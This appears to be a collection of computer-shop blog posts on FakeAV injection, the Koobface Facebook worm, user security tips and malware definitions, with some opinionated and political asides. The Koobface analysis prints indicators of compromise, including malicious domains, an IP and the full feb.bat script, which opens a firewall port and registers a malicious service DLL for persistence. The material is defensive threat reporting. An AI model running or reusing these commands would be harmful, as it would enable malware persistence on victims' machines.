Malicious script codes were inserted and being served in webpages which when triggered redirects to malicious links that serves FakeAV malware.

The following are some of the reported Malicious URLs inserted on compromised webpages:
• alexblane(dot)com/ur.php
• alisa-carter(dot)com/ur.php
• books-loader(dot)info/ur.php
• lizamoon(dot)com/ur.php
• milapop(dot)com/ur.php
• t6ryt56(dot)info/ur.php
• tadygus(dot)com/ur.php
• Worid-of-books(dot)com/ur.php
All of these URLs resolve to single IP:   91.213.29.182
SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:
• GAV: ScrInject.UR (Trojan)
• GAV: Suspicious#asprotect (Trojan)

If you don’t have a SonicWALL with the Gateway AntiVirus (or Comprehensive Security Suite), it is just a matter of time until this pops up on your network. Be prepared or better yet, contact IFix Computers for a SonicWALL that will protect your network.

Until we meet again, have a Fake AV free week!

Sonicwall Research team has discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and as part of its post-infection activity, it installs Fake AVG antivirus security software.

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV web page:

When clicking on “Remove all” or “Cancel” it attemps to initiate the download of:

•bitav_2053_ext6.exe [Detected as TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as: pack.exe [Detected as SecurityTool.W (Trojan)]

Make sure your AntiVirus provides protection against this threat via the following signatures:

Koobface.HJV (Worm)
Koobface.HJV_2 (Worm)
Koobface.HJV_3 (Worm)
Koobface.FF (Trojan)
Delf.EM (Trojan)
TDSS.ABCR (Trojan)
SecurityTool.W (Trojan)

So if you see this happening, get off the internet, reboot your PC and run a complete system series of scans. Check out our past article on how to remove this type of infection.

Here is some more technical jargon about it for those wishing to geek into it.

The Worm performs the following DNS queries:

•www.google.com
•facebook.com
•www.facebook.com
•d.static.ak.fbcdn.net
•x-treme-radio.host22.com
•www.ashiww.com
•www.wahdohotel.nl
•kingswoodwright.com
•kbfgb.greyzzsecure9.com
•3064972.greyzzsecure9.com
The Worm attempts to load various web pages using random page names with the .css extension:
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
•http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
•http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
•http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
•http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
•http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
•http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
•http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
•http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
•http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
The Worm installs the following files on the system:

•C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
•C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
•C:\WINDOWS\5456456z
•C:\WINDOWS\bt7.dat
•C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
•C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
•C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]
feb.bat contains:
netsh firewall add allowedprogram name=”feb” program=”C:\WINDOWS\system32\svchost.exe” mode=enable
netsh firewall add portopening tcp 8087 feb enable
sc create “ffeb” type= interact type= share start= auto binpath= “C:\WINDOWS\system32\svchost.exe -k ffeb”
reg add “hklm\system\currentcontrolset\services\ffeb\parameters” /v servicedll /t reg_expand_sz /d “C:\WINDOWS\system32\feb.dll” /f
reg add “hklm\system\currentcontrolset\services\ffeb” /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
reg add “hklm\software\microsoft\windows nt\currentversion\svchost” /v ffeb /t reg_multi_sz /d “ffeb\0″ /f
sc start ffeb
feb.dll contains a list or URL’s all of which are either taken down or lead to blank pages at the time of writing. Below is a sample of the URL’s contained feb.dll:
•impri{removed}.gr/.lhinrs/
•hk{removed}.org/.ycguh3/
•roomservi{removed}.com.au/.9mov05w/
•nubs.wo{removed}.co.uk/.7txq/
•lenga{removed}.com/.ck5rg8/
•cayenneo{removed}.com/.fplf/
•www.dead{removed}.co.uk/.qe9v/
•ib{removed}.org.il/.5cei7f9/
•www.kurdist{removed}.com/.x5fyik/
•heali{removed}.co.za/.12vatd/
•forwardmar{removed}.org/.6sta03t/
•numerus-{removed}.fr/.li81/
•fino{removed}.com/.ea2cuwa/
•fe{removed}.co.za/.jts51/
•tarr{removed}.com/.5fu3/
•toppla{removed}.nl/.vfnc/
•www.fishingfo{removed}.com/.5wmm9/
The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,
•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df “c:\windows\jjp156.exe”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB\0000 Service “feb”
•HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):”\??\C:\WINDOWS\system32\drivers\feb.sys”

In the last 3 weeks we have received more calls per day than we receive in a normal month from people who have pop-ups claiming they are infected or who actually clicked on the pop-up and became infected.

Hacker and @#^&*%$ heads are using news events to spread these fake alerts and infecting computers.

The wild fire stories, the Obama speech in schools, Ted (I can kill and get away with it) Kennedys death, all have sprouted a flurry of fake security warnings, infected e-mail (Phishing attacks), and fake web sites.

Without creating a 3 hour seminar, here are the basics…

1. Quit searching the internet for “fantastic” stories. Within hours of Michael Jackson’s death 212 new web sites that were infected with crap-ware popped up proposing to be Michael Jackson sites. There were also dozens of different emails with links to or pictures of his death, all which were fake.

2. Stop using My Space and Face Book! I know this is going to get me flamed and maybe even a note from one of these “businesses” but they are @$@#$ (I really do dislike using so many language referenced but this is ridiculous). Why are you telling strangers when and where you are going on vacation? To make it easier to rob you? Why are you telling the world about your 4 year old grandchild’s ability to ride his bike down the street? So the local pedophiles know where to pick him up for a little “play time”? Do you just like complaining about the cost of getting crap-ware and infections off your computer?

3. Just stop thinking the world owes you free anything. Free music, programs, data, cheese… in this age of ever expanding socialism in America, you must remember, nothing comes without a price. Limewire is a perfect example of what happens. Hackers get into or create all this “free” content management, take over your computer, infect your computer and more. That is how terrorist in Iran got plans to the presidential helicopter. Turn on the radio or go to your local radio stations web site, go to the local video store or Netflix to get a movie.

4. Stop forwarding junk emails. “Verified by Snopes” – what a crock. Almost daily I “reply all” to the sender of this type of stupidity and give actual links to Snopes and other  sources showing the hype and falsity of their fantasy. Just because you don’t like the current US President does not mean you can hope hatred or that he is not a US citizen will remove him from office. The Democratic Party may be the dumocrats to many but they certainly would not make that mistake, just quit forwarding the email.

If you received it in all capitals or with large colorful letters, underlines bolded et al please for the love of Jesus (I know the one who sent it to you told them Jesus asked them to forward it – He didn’t, I double-checked in person this morning) stop forwarding this junk.

5. Read what you are installing or updating and NEVER accept the defaults. People consistently ask me how they acquired 4, 5, 6 or more toolbars. Yes, you need the Adobe and JAVA updates but please pay attention, you should take the extra 30 seconds of your life and read each screen before selecting “Next”.

Now that I have offended most of you, what can you do if you have already been infected?

1. Update and run your PAID FOR, quality, properly configured anti-virus program (Kaspersky http://www.kaspersky.com and ESET http://www.eset.com).

2. Install, update, configure and run a real copy of Malware Bytes http://www.malwarebytes.org/ and Spybot Search and Destroy http://www.safer-networking.org

The above are excellent programs and many malicious people have created fake sites leading to crap-ware, USE the links I have provided.

There are numerous other good to excellent programs that can be used to clean up an infection, just be sure of the program and then the source where you are getting the program from.

There are several other security basics home users should have and many great hardware and software tools for Micro and Small businesses to use. Just search this site for the many articles on security your computers and network.

Until I cool off, have a virus free week!

Back in July I started on how to secure you computer (Basic Security Tips) and I have been working on Intermediate and Advanced tips ever since then, today I wanted to release a quick checklist.

Securing Your Computers, Network and Servers

Things to do:

1. Turn on Windows Critical Updates – Schedule Auto Update.
2. Install and configure for automatic update (hourly) a current anti-virus program (less than 1 years old).
3. Install a Hardware firewall (router) and update it (quarterly).
4. Install a new Software firewall (XP’s, Zone Alarm, Kerio) and update it (weekly).
5. Configure you e-mail client (Outlook, Eudora, Pegasus) for security.

Configure your browser (Internet Explorer, Opera, Netscape) for security.

6. Install a Pop up blocker.
7. Install and configure a Spam filter.
8. Install update and run a current Anti-Trojan program.
9. Constantly run a Cookie watching program.
10. Install update and run a current anti-spyware tool or two.
11. Properly secure your wireless network or hire someone to do it for you.
12. Install HOST file.

Things NOT to do:

1. Don’t pirate software, music or anything – Software, Music and Video swap sites.
2. Don’t let your kids (grandkids) steal/pirate.
3. Don’t use any file sharing or peer-to-peer internet networks.
4. Do not open “strange” e-mails (My Naked Wife, Anna Kournikova, The IRS wants you, The FBI noticed you). They are infections looking to happen.
5. Never respond to a pop up ad, not even the warnings
6. Never respond to an unsolicited email (SPAM) not to remove or win $2 million.
7. Don’t browse adult or questionable sites – drive by downloads are commonplace in those types of sites.
8. Don’t install a “toolbar” unless you:
1. Know what a tool bar is.
2. Know exactly who made the toolbar.
3. Know what you are going to use the toolbar for.

If you want to be an extremist about security and flaw, buy an Apple computer or laptop and do not use any Microsoft products on it.

Another option is to use Linux as your operating system and once again not use any Microsoft products.

Instead of Microsoft Office use 602 Pro, Easy Office, Open Office or Corel WordPerfect Office.

Instead of using Outlook Express for your e-mail or Outlook for your personal information manager and e-mail, you can use one provided in the above suites, or integrated with Mozilla browser or Opera browser. You can even use Eudora or Pegasus e-mail client programs. Don’t forget about web based programs like Yahoo, Hotmail or the one provided by your internet service provider.

When connecting to the internet don’t use Internet Explorer, some good alternatives I have used are Opera and Firefox there are several others out there also.

Below are some definitions of security terms that you might want to know.

A virus is a program, script or macro that is designed to destroy, modify or damage computer hardware and or software. Viruses are self replicating and commonly spread by e-mail messages, shareware sites (Napster, and KaZzA are the two worst), Instant messengers (chat room software) and pirated software. To reproduce a virus will copy itself on disks put into an infected computer (hard drives, zip drives and floppies). They also go into your e-mail and address book and send themselves to the names listed. Like the influenza some viruses are so complex they morph themselves as needed to continue their spreading. Viruses can hide on a hard drive, in memory or even the BIOS. The newest viruses can be attached to an e-mail that is sent to you and you do not need to even open it, just the act of retrieving your e-mail can activate it. This is why an up to date anti-virus program is so important.

Anti-virus programs are designed to protect a computer or group of computers (a network) from viruses. They are usually reactionary thus they do not prevent viruses, they just catch them before (hopefully) they infect you or your network. Anti-virus programs should always run in the background and always be running on your system.

Trojans (also known as a Trojan horse) are false programs or a program hidden in a “good” program that when activated (by running the “good” program) will open up “doors” (ports) on your computer to allow others (hackers) the ability to access your computer and view, change or add data. Trojans are usually designed to make your computer a Zombie.

Anti-Trojan programs are just that, programs that search for and remove and or prevent trojans. Anti-virus companies are adding more anti-trojan capabilities to their programs however, a separate anti-trojan program is recommended.

A Zombie is a computer that has been taken over to do the dirty work of another program or user. The Blaster worm made zombies of Windows 2000 and XP machines and had them “attack” Microsoft’s update web site. This type of attack is referred to as a Denial of Service (DoS) attack and is intended to block, crash or destroy another computer or network. There are good reason’s you don’t want to become a Zombie.

Malware (malicious software) refers to programs scripts and macros that are designed to do harm. Worms, viruses and trojans are all forms of malware.

Spyware is referred to as software that tracks computer users’ activities with or without the users’ full (or even partial) knowledge of their being tracked. Normally used by advertising agencies to target advertise to the end user, hackers are starting to use this method to steal identities and create targeting worms and viruses. Spyware is installed on a user’s machine when installing free programs such as free music sharing programs (KaZzA), visiting web pages such as adult oriented web pages (drive by downloads that you do not necessarily “voluntarily” accept) and through other downloads and browser add-ons on the Internet. If you have any of them simply delete it per the instructions provided or run a spyware removing tool.

Crapware is a program that lies to you. Normally a crapware program will present itself as a security program that may or may not work but in reality it give you false alerts, tries to convince you to buy more security programs. Most crapware could also fall under Malware.

Bloatware programs may be good but the eat so much of the computers resources that they slow the entire system or parts of the system to a crawl. They are not intentionally malicious but do cause you a pain in the wallet by requiring more RAM, a faster CPU or removing them and buying another valid program. Symantec and McAfee security programs are two examples.

A Firewall can come in two forms, hardware and software. These days you can get hardware that has the software equivalent in it. Originally hardware firewalls kept hackers out. Software firewalls kept information in. To give you an idea, the Blaster worm spread (one way) by searching the internet for certain addresses (like the address on a house) and then checking for open ports (like a burglar checking the doors and windows to see if they are open). A hardware firewall looks for this “sniffing” about and blocks it. On the other hand, if you downloaded a program that had a trojan horse the hardware firewall might miss it because:

1. You initiated the download.
2. The Trojan horse program was not active yet.

A software firewall program would detect that something was trying to access the internet from your computer and block the program and ask you if you knew what was going on. For these reason’s I highly recommend both a hardware and software firewall.

Worm’s, like viruses are malicious programs that gain access to a computer or network through a variety of methods and cause intentional harm to them. Usually a worm will spread through know holes in software programs.

Bug’s in this sense are tracking objects and usually are found in cookies.

A cookie is a small file that is placed on your computer by a web site, or more recently by e-mails, that identifies the computer and user information in a way that can be used to track or identify a person by storing passwords and usernames. In most cases cookies are put to good use, however, some sites, advertisers and hackers use them to study a person and their habits or to retrieve personal information off of a computer system.

Today the threats listed above are not stand alone and are rarely only one of the threats. The vast majority are blended, a Trojan horse that not only has Spyware but also a worm that is set to disable your firewall.

This week we are going to delve into “worms”. No, not night crawlers, that is in the outdoors section of our friendly paper. We are discussing computer worms, which are, by definition, not a virus but act much the same way. They are self replicating, usually by searching not only your email contacts list but for any reference to any email address on your computer, generally they do not cause direct damage like a virus does.

Instead worms are intended to clog up the processor’s time (the brains of your computer) and slow down network traffic (your internet connection) by reproducing so many times that they effective overload the infected systems. This is called a Denial of Service (DoS) attack or a Distributed Denial of Service (DDoS) attack. Worms usually live in active memory and not on the hard drive.

Worms use known flaws in operating systems, internet browsers and email programs to infest a computer and to send itself out of the same system. In the past you have learned how to update Microsoft products and to get a new antivirus program and update it regularly. By following these two steps you will greatly enhance your protection.

One additional piece of security you should put into place is a firewall. I will cover firewalls in more detail in a future episode so stay tuned.

I have already listed the three best ways to keep worms at bay (An updated anti-virus program, updating your software, and a firewall). If you do not use Microsoft’s products (Internet Explorer and Outlook) you still need to update them and the other software brands you use. Some optional browsers are Mozilla, Netscape and Juno. Different email programs are Pegasus and Eudora. You need to check their sites monthly for updates and patches.

If you suspect that you have a worm or want to double check your computer, you can use any of the anti-virus programs free scanning tools that are on the internet. There are rare occasions that one vendor will temporarily miss a worm or virus that another vendor will catch. More…Feel free to give the following sites a once over.

• AVG by Grisoft is located at www.grisoft.com
• F-Prot by Frisk Software is located at www.f-prot.com
• McAfee Anti-virus by Network Associates is at www.mcafee.com
• Panda AV by Panda Software can be found at www.pandasoftware.com
• RAV was created by GeCAD Software and can be found at www.ravantivirus.com
• Symantec is the manufacturer of Norton Antivirus and located at www.symantec.com
• Trend Micro owns PC-cillin located at www.trendmicro.com

These sites can take a while to scan and or download a scan utility, especially if you use a dial-up connection so have plenty of time and do not rush yourself.

In next weeks continuing saga of the internet we will study up on Trojan Horses and their effects on the Greek’s, the citizens of Troy and you, so stay tuned for the next exciting edition of The Weekly Geek.